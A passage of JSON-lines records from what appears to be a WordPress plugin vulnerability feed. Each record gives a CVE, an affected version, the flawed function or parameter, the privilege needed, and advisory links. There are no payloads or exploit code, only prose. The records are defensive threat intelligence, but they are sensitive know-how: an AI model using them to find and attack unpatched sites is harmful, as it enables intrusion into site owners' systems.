role.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2870465%40wp-meta-seo&new=2870465%40wp-meta-seo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2870465%40wp-meta-seo&new=2870465%40wp-meta-seo&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d1e498a-ddcb-4c67-bf0d-bb45b6fe0e9d\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d1e498a-ddcb-4c67-bf0d-bb45b6fe0e9d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2174","slug":"badgeos","versionImpact":"3.7.1.6","description":"The BadgeOS plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the delete_badgeos_log_entries function in versions up to, and including, 3.7.1.6. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete the plugin's log entries.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64e0adbc-c524-4f9d-9741-ce69edf888f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64e0adbc-c524-4f9d-9741-ce69edf888f7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/ajax-functions.php#L999\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/ajax-functions.php#L999\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4728","slug":"ladipage","versionImpact":"4.4","description":"The LadiApp plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the publish_lp() function hooked via an AJAX action in versions up to, and including, 4.4. This makes it possible for authenticated attackers with subscriber-level access and above to change the LadiPage key (a key fully controlled by the attacker), enabling them to freely create new pages, including web pages that trigger stored XSS","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dafc81c-f1be-422d-b34f-87f1956e8849?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dafc81c-f1be-422d-b34f-87f1956e8849?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1992\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1992\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-34423","slug":"forty-four","versionImpact":"1.4","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in phpbits Forty Four \u2013 404 Plugin for WordPress allows Stored XSS.This issue affects Forty Four \u2013 404 Plugin for WordPress: from n\/a through 1.4.\n\n","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/forty-four\\\/wordpress-forty-four-404-plugin-for-wordpress-plugin-1-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/forty-four\\\/wordpress-forty-four-404-plugin-for-wordpress-plugin-1-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5073","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.21","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Twitter Feed component in all versions up to, and including, 5.9.21 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8db80ef-5863-41dd-b33f-850984a72ee6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8db80ef-5863-41dd-b33f-850984a72ee6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Traits\\\/Twitter_Feed.php#L210\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Traits\\\/Twitter_Feed.php#L210\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/essential-addons-for-elementor-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/essential-addons-for-elementor-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090746\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090746\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3993","slug":"azan","versionImpact":"0.6","description":"The AZAN Plugin WordPress plugin through 0.6 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19cd60dd-8599-4af3-99db-c42de504606c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19cd60dd-8599-4af3-99db-c42de504606c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5648","slug":"wisdm-reports-for-learndash","versionImpact":"1.8.2","description":"The LearnDash LMS \u2013 Reports plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 1.8.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update various plugin settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fbbd0d7-882f-4bc8-a67a-4d6dc05cb796?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fbbd0d7-882f-4bc8-a67a-4d6dc05cb796?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wisdm-reports-for-learndash\\\/trunk\\\/includes\\\/admin\\\/class-admin-functions.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wisdm-reports-for-learndash\\\/trunk\\\/includes\\\/admin\\\/class-admin-functions.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wisdm-reports-for-learndash\\\/trunk\\\/includes\\\/admin\\\/class-admin-functions.php#L261\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wisdm-reports-for-learndash\\\/trunk\\\/includes\\\/admin\\\/class-admin-functions.php#L261\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wisdm-reports-for-learndash\\\/trunk\\\/includes\\\/admin\\\/class-admin-functions.php#L284\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wisdm-reports-for-learndash\\\/trunk\\\/includes\\\/admin\\\/class-admin-functions.php#L284\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wisdm-reports-for-learndash\\\/trunk\\\/includes\\\/admin\\\/class-admin-functions.php#L423\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wisdm-reports-for-learndash\\\/trunk\\\/includes\\\/admin\\\/class-admin-functions.php#L423\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wisdm-reports-for-learndash\\\/trunk\\\/includes\\\/admin\\\/class-admin-functions.php#L455\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wisdm-reports-for-learndash\\\/trunk\\\/includes\\\/admin\\\/class-admin-functions.php#L455\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7895","slug":"beaver-builder-lite-version","versionImpact":"2.8.3.5","description":"The Beaver Builder \u2013 WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018type\u2019 parameter in all versions up to, and including, 2.8.3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f83db067-843f-4dd8-b5d1-83e95c6c88cc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f83db067-843f-4dd8-b5d1-83e95c6c88cc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/trunk\\\/modules\\\/button-group\\\/button-group.php#L195\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/trunk\\\/modules\\\/button-group\\\/button-group.php#L195\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/trunk\\\/modules\\\/button-group\\\/includes\\\/frontend.php#L2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/trunk\\\/modules\\\/button-group\\\/includes\\\/frontend.php#L2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/beaver-builder-lite-version\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/beaver-builder-lite-version\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpbeaverbuilder.com\\\/change-logs\\\/\",\"name\":\"https:\\\/\\\/www.wpbeaverbuilder.com\\\/change-logs\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3143080%40beaver-builder-lite-version&new=3143080%40beaver-builder-lite-version&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3143080%40beaver-builder-lite-version&new=3143080%40beaver-builder-lite-version&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10232","slug":"atomchat","versionImpact":"1.1.5","description":"The Group Chat & Video Chat by AtomChat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's atomchat shortcode in all versions up to, and including, 1.1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c10993bd-b4f3-44b6-bb0f-cb783dbcf314?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c10993bd-b4f3-44b6-bb0f-cb783dbcf314?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/atomchat\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/atomchat\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178522\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178522\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13637","slug":"demo-awesome","versionImpact":"1.0.3","description":"The Demo Awesome plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the install_plugin function in all versions up to, and including, 1.0.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install and activate arbitrary plugins..","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/demo-awesome\\\/trunk\\\/inc\\\/admin\\\/class-demo-awesome-admin.php#L407\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/demo-awesome\\\/trunk\\\/inc\\\/admin\\\/class-demo-awesome-admin.php#L407\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/demo-awesome\\\/trunk\\\/inc\\\/admin\\\/js\\\/admin.js#L1684\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/demo-awesome\\\/trunk\\\/inc\\\/admin\\\/js\\\/admin.js#L1684\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/demo-awesome\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/demo-awesome\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a552f81-b222-46f0-b318-702e09d249c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a552f81-b222-46f0-b318-702e09d249c1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5926","slug":"link-shield","versionImpact":"0.5.4","description":"The Link Shield plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.5.4. This is due to missing or incorrect nonce validation on the link_shield_menu_options() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/link-shield\\\/trunk\\\/link-shield.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/link-shield\\\/trunk\\\/link-shield.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e577828-4368-4781-877b-badb4dc50763?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e577828-4368-4781-877b-badb4dc50763?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5843","slug":"brandfolder","versionImpact":"5.0.19","description":"The Brandfolder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 5.0.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brandfolder\\\/tags\\\/5.0.19\\\/brandfolder-integration.php#L138\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brandfolder\\\/tags\\\/5.0.19\\\/brandfolder-integration.php#L138\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/brandfolder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/brandfolder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bedbe508-e879-4989-89a6-db909ecd35a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bedbe508-e879-4989-89a6-db909ecd35a8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8080","slug":"alobaidi-captcha","versionImpact":"1.0.3","description":"The Alobaidi Captcha plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin settings in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alobaidi-captcha\\\/trunk\\\/login-form.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alobaidi-captcha\\\/trunk\\\/login-form.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alobaidi-captcha\\\/trunk\\\/login-form.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alobaidi-captcha\\\/trunk\\\/login-form.php#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alobaidi-captcha\\\/trunk\\\/login-form.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alobaidi-captcha\\\/trunk\\\/login-form.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44f6048b-7de6-4ec9-af89-cd08c43d0aaa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44f6048b-7de6-4ec9-af89-cd08c43d0aaa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1022","slug":"wp-meta-seo","versionImpact":"4.5.3","description":"The WP Meta SEO plugin for WordPress is vulnerable to unauthorized options update due to a missing capability check on the wpmsGGSaveInformation function in versions up to, and including, 4.5.3. This makes it possible for authenticated attackers with subscriber-level access to update google analytics options maintained by the plugin. This vulnerability occurred as a result of the plugin relying on nonce checks as a means of access control, and that nonce being accessible to all authenticated users regardless of role.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2870465%40wp-meta-seo&new=2870465%40wp-meta-seo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2870465%40wp-meta-seo&new=2870465%40wp-meta-seo&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/702f9d3b-5d33-4215-ac76-9aae3162d775\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/702f9d3b-5d33-4215-ac76-9aae3162d775\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2173","slug":"badgeos","versionImpact":"3.7.1.6","description":"The BadgeOS plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 3.7.1.6. This is due to improper validation and authorization checks within the badgeos_delete_step_ajax_handler, badgeos_delete_award_step_ajax_handler, badgeos_delete_deduct_step_ajax_handler, and badgeos_delete_rank_req_step_ajax_handler functions. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete arbitrary posts.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/steps-ui.php#L371\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/steps-ui.php#L371\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebb9e37c-9e8b-429b-b4ef-cd875351852c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebb9e37c-9e8b-429b-b4ef-cd875351852c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/points\\\/deduct-steps-ui.php#L441\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/points\\\/deduct-steps-ui.php#L441\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/points\\\/award-steps-ui.php#L384\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/points\\\/award-steps-ui.php#L384\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/ranks\\\/rank-steps-ui.php#L375\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/ranks\\\/rank-steps-ui.php#L375\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5745","slug":"reusable-text-blocks","versionImpact":"1.5.3","description":"The Reusable Text Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'text-blocks' shortcode in versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with author-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reusable-text-blocks\\\/tags\\\/1.5.3\\\/text-blocks.php#L319\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reusable-text-blocks\\\/tags\\\/1.5.3\\\/text-blocks.php#L319\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d627ee7-1175-4621-a477-1e9ec2d05eee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d627ee7-1175-4621-a477-1e9ec2d05eee?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4629","slug":"ladipage","versionImpact":"4.3","description":"The LadiApp plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the save_config() function in versions up to, and including, 4.3. This makes it possible for unauthenticated attackers to update the 'ladipage_config' option via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea595e78-f4fc-491d-8143-c836302618d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea595e78-f4fc-491d-8143-c836302618d5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1971\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1971\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3637","slug":"lead-form-builder","versionImpact":"1.8.9","description":"The Responsive Contact Form Builder & Lead Generation Plugin WordPress plugin through 1.8.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/33f6fea6-c784-40ae-a548-55d41618752d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/33f6fea6-c784-40ae-a548-55d41618752d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-34420","slug":"gplus-comments","versionImpact":"1.6.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in talspotim Comments Evolved for WordPress allows Stored XSS.This issue affects Comments Evolved for WordPress: from n\/a through 1.6.3.\n\n","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gplus-comments\\\/wordpress-comments-evolved-for-wordpress-plugin-1-6-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gplus-comments\\\/wordpress-comments-evolved-for-wordpress-plugin-1-6-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3992","slug":"amen","versionImpact":"3.3.1","description":"The Amen WordPress plugin through 3.3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9fe3101-8033-4eee-8b37-06856872e9ef\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9fe3101-8033-4eee-8b37-06856872e9ef\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5600","slug":"happy-scss-compiler","versionImpact":"1.3.10","description":"The SCSS Happy Compiler \u2013 Compile SCSS to CSS & Automatic Enqueue plugin for WordPress is vulnerable to Stored Cross-Site Scripting due to a missing capability check and insufficient sanitization on the import_settings() function in all versions up to, and including, 1.3.10. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject malicious web scripts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 